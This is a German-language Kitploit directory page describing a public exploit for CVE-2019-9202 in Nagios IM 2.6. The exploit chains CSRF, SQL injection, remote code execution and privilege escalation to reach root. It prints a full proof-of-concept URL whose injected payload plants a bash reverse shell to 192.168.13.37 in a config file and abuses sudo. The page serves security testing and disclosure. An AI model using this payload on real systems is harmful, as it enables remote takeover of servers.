Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-9202 — Nagios IM 2.6 Remote-Code-Ausführungs-Exploit: CSRF + SQLi + RCE + LPE --> remote root | Kitploit
Tools/GitHubGitHub/polict/cve-2019-9202
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubpolict/cve-2019-9202

CVE-2019-9202

Nagios IM 2.6 Remote-Code-Ausführungs-Exploit: CSRF + SQLi + RCE + LPE --> remote root

Repository anzeigen
4vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-9202

Nagios IM 2.6 Exploit zur Remote-Code-Ausführung: CSRF + SQLi + RCE + LPE --> Remote-Root

Beschreibung

Durch die Verkettung einer Cross-Site-Request-Forgery (CSRF) / Autorisierungsumgehung (CVE-2019-9203) ist es möglich, eine Union-basierte SQL-Injection (CVE-2019-9204), eine Remote-Code-Ausführung (RCE) (CVE-2019-9202) und eine lokale Privilegienausweitung (LPE) (CVE-2019-9166) auszunutzen, um Root-Rechte auf einem entfernten Nagios XI-Server zu erlangen.

Anforderungen

Das Opfer muss in Nagios XI authentifiziert sein, meines Wissens nach reichen die niedrigsten Berechtigungen aus.

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

Tool herunterladen